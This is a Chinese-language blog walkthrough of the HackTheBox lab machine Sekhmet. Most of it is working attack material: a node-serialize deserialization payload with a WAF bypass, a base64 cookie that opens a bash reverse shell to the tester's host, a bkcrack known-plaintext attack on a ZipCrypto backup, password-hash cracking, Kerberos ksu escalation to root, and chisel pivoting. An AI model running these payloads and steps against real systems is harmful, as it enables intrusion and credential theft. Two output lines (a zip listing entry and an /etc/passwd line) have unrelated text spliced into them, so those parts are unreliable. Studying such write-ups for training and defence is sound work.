title: HTB Walkthrough Sekhmet layout: true categories: HackTheBox tags:
-
Active Directory cover: https://raw.githubusercontent.com/Crazyinside/blog.image/main/material/wallhaven-d5xolg_1920x1080.png
Port Info
$ sudo nmap -p- -sC -sV 10.10.11.179 -oN PortOpen
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-18 10:39 CST
Nmap scan report for 10.10.11.179
Host is up (0.11s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 8c7155df97275ed5375a8de2923bf36e (RSA)
| 256 b232f5889bfb58fa35b0710c9abd3cef (ECDSA)
|_ 256 eb73c0936e40c8f6b0a828937d18474c (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: 403 Forbidden
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 258.45 seconds
Get Shell
可以在首页搜集一些用户名:
尝试目录爆破能够发现一些信息:
$ dirsearch -u http://www.windcorp.htb/ -x 403
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/crazyinside/.dirsearch/reports/www.windcorp.htb/-_23-04-18_10-55-13.txt
Error Log: /home/crazyinside/.dirsearch/logs/errors-23-04-18_10-55-13.log
Target: http://www.windcorp.htb/
[10:55:14] Starting:
[10:55:25] 200 - 213B - /Readme.txt
[10:55:38] 301 - 169B - /assets -> http://www.windcorp.htb/assets/
[10:55:41] 200 - 2KB - /changelog.txt
[10:55:50] 200 - 34KB - /index.html
$ curl http://www.windcorp.htb/Readme.txt
Thanks for downloading this template!
Template Name: MyBiz
Template URL: https://bootstrapmade.com/mybiz-free-business-bootstrap-theme/
Author: BootstrapMade.com
License: https://bootstrapmade.com/license/
谢谢你下载这个模板,另一个文件里有模板版本信息:
$ curl http://www.windcorp.htb/changelog.txt
Version: 4.7.0
- Updated Bootstrap to version 5.1.3
- Updated all outdated third party vendor libraries to their latest versions
Version: 4.6.0
- Updated Bootstrap to version 5.1.2
- Updated all outdated third party vendor libraries to their latest versions
Version: 4.5.0
- Fixed slider issue in testimonials and portfolio details sections
Version: 4.4.0
- Updated Bootstrap to version 5.1.1
- Updated all outdated third party vendor libraries to their latest versions
- Improved and updated dev version gulp scripts
Version: 4.3.0
- Updated Bootstrap to version 5.0.1
- Updated all outdated third party vendor libraries to their latest versions
- Fixed navigation links focus color
Version: 4.2.0
- Updated Bootstrap to version 5.0.0 Final
- Updated all outdated third party vendor libraries to their latest versions
Version: 4.1.0
- Updated Bootstrap to version 5.0.0-beta3
- Updated all outdated third party vendor libraries to their latest versions
- Updated the PHP Email Form to V3.1
Version: 4.0.1
- Updated Bootstrap to version 5.0.0-beta2
- Updated all outdated third party vendor libraries to their latest versions
Version: 4.0.0
- The template does not require jQuery anymore
- Removed jQuery and all the jQuery plugins
- The assets/js/main.js was rewritten completely with vanilla Javascript. No more jQuery code
- Restructured the dev version for better development experience
- Updated the PHP Email Form to V3.0 - No jQuery dependency. Added attachment support
Version: 3.0.0
- Initial release with Bootstrap v5.0 Beta 1
Version: 2.2.0
- Updated Bootstrap to version 4.5.3
- Updated all outdated third party vendor libraries to their latest versions
- Updated the PHP Email Form to v2.3
- Other small fixes and improvements
Version: 2.1.0
- Updated Bootstrap to version 4.5.0
- Updated the PHP Email Form library to version 2.0 with reCaptcha support
- Aded inner-page.html tempalte
- Added smooth scroll on page load with hash links in the url
- Updated all outdated third party vendor libraries to their latest versions
- Other small fixes and improvements
Version: 2.0.0
- The template was rebuilt from scratch with the latest Bootstrap version (4.4.1)
- Added SMPTP support for the contact form script (Pro)
- Added NodeJS NPM Development version (Pro unlimited & Membership members)
Version: 1.0.0
- Initial Release
尝试枚举Vhost:
$ wfuzz -c -u http://windcorp.htb -H "Host:FUZZ.windcorp.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hh 153
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://windcorp.htb/
Total requests: 114441
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000048: 403 43 L 162 W 2436 Ch "portal"
显示403但是可以访问:
admin:admin可以登陆,但是页面是静态的:
尝试枚举目录返回都是404:
目前来说,着手的攻击点其实就只有登陆入口了。
POST /login HTTP/1.1
Host: portal.windcorp.htb
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://portal.windcorp.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://portal.windcorp.htb/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: app=s%3AQ4mCWykqKPCQ5RqqdEVnr28wxccUAEzH.oKfK7yn6guomWw5X%2BxBP8rAqPblw30IAQlwI5X8z5lg
Connection: close
username=admin&password=admin
当登陆成功时服务器会返回302跳转并设置cookie:
HTTP/1.1 302 Found
Server: nginx/1.18.0
Date: Tue, 18 Apr 2023 03:18:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 46
Connection: close
X-Powered-By: Express
Set-Cookie: profile=eyJ1c2VybmFtZSI6ImFkbWluIiwiYWRtaW4iOiIxIiwibG9nb24iOjE2ODE3ODc5MDczMjh9; Max-Age=604800; HttpOnly
Location: /
Vary: Accept
<p>Found. Redirecting to <a href="/">/</a></p>
cookie只用了base64编码:
$ echo "eyJ1c2VybmFtZSI6ImFkbWluIiwiYWRtaW4iOiIxIiwibG9nb24iOjE2ODE3ODc5MDczMjh9"|base64 -d
{"username":"admin","admin":"1","logon":1681787907328}
或许我该尝试反序列化注入,我尝试搜集目标服务器语言环境:
$ curl -I http://portal.windcorp.htb/
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 18 Apr 2023 03:20:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1066
Connection: keep-alive
X-Powered-By: Express
ETag: W/"42a-ceoj/qzu7pE8a4/5MOc2Roj9g0U"
Set-Cookie: app=s%3AJp-GMeydxxsvPq7AS8b_4q8yF8iOPEqn.3GtKCu2b2i8uxC4F70hRaTszdQPP1U95diqVY9M9Pkk; Path=/; HttpOnly
搜索引擎可以告诉我,目标或许搭载的是Nodejs.
在HackTricks查找了如下payload:
{"rce":"_$$ND_FUNC$$_function (){n t require('child_process').exec('ls /',
function(error, stdout, stderr) { console.log(stdout) });n }()"}
将其编码提交,触发WAF:
这种不会将IP拉黑的WAF其实可以非常简单粗暴的尝试绕过,我像这样一点一点把payload删掉,当只剩这样时候WAF不再拦截:
最后发现这样WAF会拦截:
$ echo "eyJyY2UiOiJfJCRORF9GVU5DJCRf"|base64 -d
{"rce":"_$$ND_FUNC$$_
这样他就不会拦截:
$ echo "eyJyY2UiOiJfJCRORF9GVU5DJCR"|base64 -d
{"rce":"_$$ND_FUNC$$
然后再经过尝试发现是函数方法触发了WAF拦截:
我可以尝试黑名单绕过,目标HTTP头中已经给出了目标编码是charset=utf-8,但是尝试将$进行编码后依旧会触发WAF拦截,
{"rce":"_$$ND_FUNCu0024$_function ()u007brequire('child_process').exec('ping -c 1 10.10.16.3',
function(error, stdout, stderr) { console.log(stdout) });n }()"}
折腾半天没反应,发现请求地方错了,不应该请求About,应该请求Home:
GET / HTTP/1.1
Host: portal.windcorp.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://portal.windcorp.htb/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: app=s%3A3zLkS45GlQu11iwPG5UqOGzTJVH0V7XS.cLmH%2B5RiAhyxb6r495zJ2ZQbE5G3Cb15zeM%2B0LomvtU; profile=eyJyY2UiOiJfJCRORF9GVU5DXHUwMDI0JF9mdW5jdGlvbiAoKVx1MDA3YiByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncGluZyAtYyAxIDEwLjEwLjE2LjMnLCBmdW5jdGlvbihlcnJvciwgc3Rkb3V0LCBzdGRlcnIpIHsgY29uc29sZS5sb2coc3Rkb3V0KSB9KTtcbiB9KCkifQ==
If-None-Match: W/"56c-p/i7GTqmqUq+k/bjnk4SFBcSAkI"
Connection: close
监听到ping流量请求:
$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
12:49:54.744450 IP windcorp.htb > 10.10.16.3: ICMP echo request, id 1000, seq 1, length 64
12:49:54.744472 IP 10.10.16.3 > windcorp.htb: ICMP echo reply, id 1000, seq 1, length 64
改写Payload弹shell:
{"rce":"_$$ND_FUNCu0024$_function ()u007brequire('child_process').exec('bash -c "bash -i >& /dev/tcp/10.10.16.3/1337 0>&1" ',function(error, stdout, stderr) { console.log(stdout) });n }()"}
GET / HTTP/1.1
Host: portal.windcorp.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://portal.windcorp.htb/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: app=s%3A3zLkS45GlQu11iwPG5UqOGzTJVH0V7XS.cLmH%2B5RiAhyxb6r495zJ2ZQbE5G3Cb15zeM%2B0LomvtU; profile=eyJyY2UiOiJfJCRORF9GVU5DXHUwMDI0JF9mdW5jdGlvbiAoKVx1MDA3YnJlcXVpcmUoJ2NoaWxkX3Byb2Nlc3MnKS5leGVjKCdiYXNoIC1jIFwiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4zLzEzMzcgMD4mMVwiICcsZnVuY3Rpb24oZXJyb3IsIHN0ZG91dCwgc3RkZXJyKSB7IGNvbnNvbGUubG9nKHN0ZG91dCkgfSk7XG4gfSgpIn0=
If-None-Match: W/"56c-p/i7GTqmqUq+k/bjnk4SFBcSAkI"
Connection: close
获取shell:
$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.179] 58394
bash: cannot set terminal process group (474): Inappropriate ioctl for device
bash: no job control in this shell
webster@webserver:/$ whoami
whoami
webster
webster@webserver:/$ ls
Get Ray.duncan
在当前用户目录下有个backup.zip,
webster@webserver:~$ ls
backup.zip
发现了WEB目录,我将备份文件拷贝了过来:
webster@webserver:/var/www/windcorp$ ls
assets changelog.txt index.html portfolio-details.html Readme.txt
webster@webserver:/var/www/windcorp$ cp ~/backup.zip .
webster@webserver:/var/www/windcorp$ ls
assets changelog.txt portfolio-details.html
backup.zip index.html Readme.txt
压缩文件加密的,尝试破解:
$ john hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2023-04-18 13:09) 0g/s 20490Kp/s 20490Kc/s 20490KC/s (7MNegN77)..*7¡Vamos!
Session completed.
没结果,7z l -slt可以显示压缩文件中加密方式是ZipCrypto Deflate
$ 7z l -slt backup.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=zh_CN.UTF-8,Utf16=on,HugeFiles=on,64 bits,16 CPUs AMD Ryzen 7 6800H with Radeon Graphics (A40F41),ASM,AES-NI)
Scanning the drive for archives:
1 file, 72984 bytes (72 KiB)
Listing archive: backup.zip
--
Path = backup.zip
Type = zip
Physical Size = 72984
----------
Path = etc/passwd
Folder = -
Size = 1509
Packed Size = 554
Modified = 2022-04-30 23:27:46
Created =
Accessed =
Attributes = _ -rw-r--r--
Encrypted = +
Comment =
CRC = D00EEE74
Method = ZipCrypto Deflate
Host OS = Unix
Version = 20
Volume Index = 0
使用bkcrack列出解压文件条目。
$ ./bkcrack -L ~/Documents/HackTheBox/Sekhmet/backup.zip
bkcrack 1.5.0 - 2022-07-07
Archive: /home/crazyinside/Documents/HackTheBox/Sekhmet/backup.zip
Index Encryption Compression CRC32 Uncompressed Packed size Name
----- ---------- ----------- -------- ------------ ------------ ----------------
0 ZipCrypto Deflate d00eee74 1509 554 etc/passwd
1 None Store 00000000 0 0 etc/sssd/conf.d/
2 ZipCrypto Deflate a46408d2 411 278 etc/sssd/sssd.conf
3 None Store 00000000 0 0 var/lib/sss/db/
4 ZipCrypto Deflate 7c8f25f5 1286144 3122 var/lib/sss/db/timestamps_windcorp.htb.ldb
5 ZipCrypto Deflate 1586648d 1286144 2492 var/lib/sss/db/config.ldb
6 None Store 00000000 0 0 var/lib/sss/db/test/
7 ZipCrypto Deflate 2dda0c65 1286144 2421 var/lib/sss/db/test/timestamps_windcorp.htb.ldb
8 ZipCrypto Deflate 861052a8 1286144 2536 var/lib/sss/db/test/config.ldb
9 ZipCrypto Deflate cdf7b29c 1286144 5044 var/lib/sss/db/test/cache_windcorp.htb.ldb
10 ZipCrypto Deflate 2d029dc7 1286144 1505 var/lib/sss/db/test/sssd.ldb
11 ZipCrypto Deflate 22pt/bkcrack/bkcrack -C uploaded-file-3422.zip -c .bash_locd39c0 4016 3651 var/lib/sss/db/test/ccache_WINDCORP.HTB
12 ZipCrypto Deflate 8ff31622 1609728 10145 var/lib/sss/db/cache_windcorp.htb.ldb
13 ZipCrypto Deflate 2d029dc7 1286144 1505 var/lib/sss/db/sssd.ldb
14 ZipCrypto Deflate c6656211 2708 2519 var/lib/sss/db/ccache_WINDCORP.HTB
15 None Store 00000000 0 0 var/lib/sss/deskprofile/
16 None Store 00000000 0 0 var/lib/sss/gpo_cache/
17 None Store 00000000 0 0 var/lib/sss/gpo_cache/windcorp.htb/
18 None Store 00000000 0 0 var/lib/sss/gpo_cache/windcorp.htb/Policies/
19 None Store 00000000 0 0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/
20 None Store 00000000 0 0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/
21 None Store 00000000 0 0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/
22 None Store 00000000 0 0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/
23 None Store 00000000 0 0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/
24 ZipCrypto Deflate 5b393fde 2568 700 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/GptTmpl.inf
25 ZipCrypto Store 74a7bec9 23 35 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
26 None Store 00000000 0 0 var/lib/sss/keytabs/
27 None Store 00000000 0 0 var/lib/sss/mc/
28 ZipCrypto Deflate 10c2d4bf
9253600 9186 var/lib/sss/mc/passwd
29 ZipCrypto Deflate a0dedff3 6940392 6814 var/lib/sss/mc/group
30 ZipCrypto Deflate 09850b8d 11567160 11389 var/lib/sss/mc/initgroups
31 None Store 00000000 0 0 var/lib/sss/pipes/
32 None Store 00000000 0 0 var/lib/sss/pipes/private/
33 None Store 00000000 0 0 var/lib/sss/pubconf/
34 ZipCrypto Store 5a1a3ba3 12 24 var/lib/sss/pubconf/kdcinfo.WINDCORP.HTB
35 None Store 00000000 0 0 var/lib/sss/pubconf/krb5.include.d/
36 ZipCrypto Store 8c44e15f 40 52 var/lib/sss/pubconf/krb5.include.d/krb5_libdefaults
37 ZipCrypto Deflate cc306b59 113 105 var/lib/sss/pubconf/krb5.include.d/localauth_plugin
38 ZipCrypto Store 701d2553 15 27 var/lib/sss/pubconf/krb5.include.d/domain_realm_windcorp_htb
39 None Store 00000000 0 0 var/lib/sss/secrets/
其中有/etc/passwd,ZipCrypto破解攻击需要一份未加密的文件,根据工具破解的说明,我将目标上未加密的/etc/passwd复制到本地:
webster@webserver:/$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usreyJ1c2VybmFtZSI6ImFkbWluIiwiYWRtaW4iOiIxIiwibG9nb24iOjE2ODE4Njc3OTg4Nzl9/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
webster:x:1000:1000:webster,,,:/home/webster:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
sssd:x:106:112:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
ntp:x:107:113::/nonexistent:/usr/sbin/nologin
webster@webserver:/$
从解压文件中获取keys:
$ ~/Public/bkcrack-1.5.0-Linux/bkcrack -C backup.zip -c etc/passwd -P plain.zip -p passwd
bkcrack 1.5.0 - 2022-07-07
[14:03:45] Z reduction using 535 bytes of known plaintext
100.0 % (535 / 535)
[14:03:46] Attack on 14541 Z values at index 9
Keys: d6829d8d 8514ff97 afc3f825
91.7 % (13330 / 14541)
[14:03:51] Keys
d6829d8d 8514ff97 afc3f825
利用keys将先前zip中的文件拷贝到一个新的解压文件中,并给新的压缩文件密码设置为password.
$ ~/Public/bkcrack-1.5.0-Linux/bkcrack -C backup.zip -k d6829d8d 8514ff97 afc3f825 -U backuppassword.zip password
bkcrack 1.5.0 - 2022-07-07
[14:08:31] Writing unlocked archive backuppassword.zip with password "password"
100.0 % (21 / 21)
Wrote unlocked archive.
然后将其解压:
$ unzip backuppassword.zip
Archive: backuppassword.zip
[backuppassword.zip] etc/passwd password:
inflating: etc/passwd
creating: etc/sssd/conf.d/
inflating: etc/sssd/sssd.conf
creating: var/lib/sss/db/
inflating: var/lib/sss/db/timestamps_windcorp.htb.ldb
inflating: var/lib/sss/db/config.ldb
creating: var/lib/sss/db/test/
inflating: var/lib/sss/db/test/timestamps_windcorp.htb.ldb
inflating: var/lib/sss/db/test/config.ldb
inflating: var/lib/sss/db/test/cache_windcorp.htb.ldb
inflating: var/lib/sss/db/test/sssd.ldb
inflating: var/lib/sss/db/test/ccache_WINDCORP.HTB
inflating: var/lib/sss/db/cache_windcorp.htb.ldb
inflating: var/lib/sss/db/sssd.ldb
inflating: var/lib/sss/db/ccache_WINDCORP.HTB
creating: var/lib/sss/deskprofile/
creating: var/lib/sss/gpo_cache/
creating: var/lib/sss/gpo_cache/windcorp.htb/
creating: var/lib/sss/gpo_cache/windcorp.htb/Policies/
creating: var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/
creating: var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/
creating: var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/
creating: var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/
creating: var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/
inflating: var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/GptTmpl.inf
extracting: var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
creating: var/lib/sss/keytabs/
creating: var/lib/sss/mc/
inflating: var/lib/sss/mc/passwd
inflating: var/lib/sss/mc/group
inflating: var/lib/sss/mc/initgroups
creating: var/lib/sss/pipes/
creating: var/lib/sss/pipes/private/
creating: var/lib/sss/pubconf/
extracting: var/lib/sss/pubconf/kdcinfo.WINDCORP.HTB
creating: var/lib/sss/pubconf/krb5.include.d/
extracting: var/lib/sss/pubconf/krb5.include.d/krb5_libdefaults
inflating: var/lib/sss/pubconf/krb5.include.d/localauth_plugin
extracting: var/lib/sss/pubconf/krb5.include.d/domain_realm_windcorp_htb
creating: var/lib/sss/secrets/
那我为什么不直接去用shell访问目标的目录?
webster@webserver:/$ cat /etc/ss
ssh/ ssl/ sssd/
webster@webserver:/$ cat /etc/ss
ssh/ ssl/ sssd/
webster@webserver:/$ cd /etc/sssd
webster@webserver:/etc/sssd$ ls
ls: cannot open directory '.': Permission denied
webster@webserver:/etc/sssd$
没权限,那没事了。从文件来看似乎是一个域环境:
$ cat sssd.conf
[sssd]
domains = windcorp.htb
config_file_version = 2
services = nss, pam
[domain/windcorp.htb]
default_shell = /bin/bash
krb5_store_password_if_offline = True
cache_credentials = True
krb5_realm = WINDCORP.HTB
realmd_tags = manages-system joined-with-adcli
id_provider = ad
fallback_homedir = /home/%u@%d
ad_domain = windcorp.htb
use_fully_qualified_names = True
ldap_id_mapping = True
access_provider = ad
域控制器的IP是:
webster@webserver:/etc/sssd$ nslookup windcorp.htb
Server: 192.168.0.2
Address: 192.168.0.2#53
Name: windcorp.htb
Address: 192.168.0.2
Name: windcorp.htb
Address: 10.10.11.179
在压缩包解压的目录中有一个cache_windcorp.htb.ldb文件,其中包含一个类似哈希的东西:
$ cat cache_windcorp.htb.ldb
如果哈希不确定什么类型,可以直接丢john:
$ john hash -w=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pantera (?)
1g 0:00:00:00 DONE (2023-04-18 14:30) 5.555g/s 11377p/s 11377c/s 11377C/s 123456..lovers1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
用户名在文件里也能找到:
申请ray.duncan用户的票据并切换到ray.duncan用户身份:
webster@webserver:/etc/sssd$ klist
klist: No credentials cache found (filename: /tmp/.cache/krb5cc.6323)
webster@webserver:/etc/sssd$ kinit ray.duncan
Password for [email protected]:
webster@webserver:/etc/sssd$ klist
Ticket cache: FILE:/tmp/.cache/krb5cc.6323
Default principal: [email protected]
Valid starting Expires Service principal
04/18/2023 08:34:33 04/18/2023 13:34:33 krbtgt/[email protected]
renew until 04/19/2023 08:34:27
webster@webserver:/etc/sssd$ ksu
Authenticated [email protected]
Account root: authorization for [email protected] successful
Changing uid to root (0)
root@webserver:/etc/sssd#
Get Bob.Wood
定位域控:
root@webserver:~# ping 192.168.0.2
PING 192.168.0.2 (192.168.0.2) 56(84) bytes of data.
64 bytes from 192.168.0.2: icmp_seq=1 ttl=128 time=0.614 ms
64 bytes from 192.168.0.2: icmp_seq=2 ttl=128 time=0.525 ms
^C
--- 192.168.0.2 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1017ms
rtt min/avg/max/mdev = 0.525/0.569/0.614/0.044 ms
root@webserver:~# nc -zv 192.168.0.2 88
hope.windcorp.htb [192.168.0.2] 88 (kerberos) open
上传一个mini版的nmap对目标进行端口扫描:
root@webserver:~# ./nmap 192.168.0.2 -p1-10000 --min-rate 2000
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-04-18 09:17 CEST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for hope.windcorp.htb (192.168.0.2)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (-0.0043s latency).
Not shown: 9988 filtered ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
88/tcp open kerberos
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd
636/tcp open ldaps
3268/tcp open unknown
3269/tcp open unknown
5985/tcp open unknown
9389/tcp open unknown
MAC Address: 00:15:5D:10:93:01 (Unknown)
投放chisel做隧道:
$ ./chisel server -p 8000 --reverse
2023/04/18 15:21:59 server: Reverse tunnelling enabled
2023/04/18 15:21:59 server: Fingerprint oAssYsdw8XNKjduKiPUmpUWCSZpk+r9UOY0H0PrmVog=
2023/04/18 15:21:59 server: Listening on http://0.0.0.0:8000
2023/04/18 15:22:37 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
root@webserver:~# ./chisel client 10.10.16.3:8000 R:socks
这ssh怕不是域控上模拟的一个linux子系统:
$ proxychains ssh '[email protected]'@192.168.0.2
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 192.168.0.2:22 ... OK
The authenticity of host '192.168.0.2 (192.168.0.2)' can't be established.
ED25519 key fingerprint is SHA256:lQC3oE1gDOR7phAqbAJtVybs3VgxWby/lqL7ySR6/1M.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:3: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.2' (ED25519) to the list of known hosts.
[email protected]@192.168.0.2's password:
Linux webserver 5.10.0-17-amd64 #1 SMP Debian 5.10.136-1 (2022-08-13) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Apr 18 08:38:58 2023 from hope.windcorp.htb
Could not chdir to home directory /home/[email protected]: No such file or directory
[email protected]@webserver:/$ whoami
[email protected]
[email protected]@webserver:/$ ls
bin dev home initrd.img.old lib32 libx32 media opt root sbin sys usr vmlinuz
boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
[email protected]@webserver:/$
我在本地通过代理申请ray.duncan用户的票据:
$ proxychains kinit ray.duncan
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
Password for [email protected]:
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
$ ls
chisel chisel_1.8.1_linux_amd64.gz chisel.exe
$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: [email protected]
Valid starting Expires Service principal
2023-04-18T15:35:43 2023-04-18T20:35:43 krbtgt/[email protected]
renew until 2023-04-19T15:34:52
在smb目录里有个debug-users.txt:
$ proxychains smbclient -k //hope.windcorp.htb/WC-Share
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
WARNING: The option -k|--kerberos is deprecated!
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
Try "help" to get a list of possible commands.
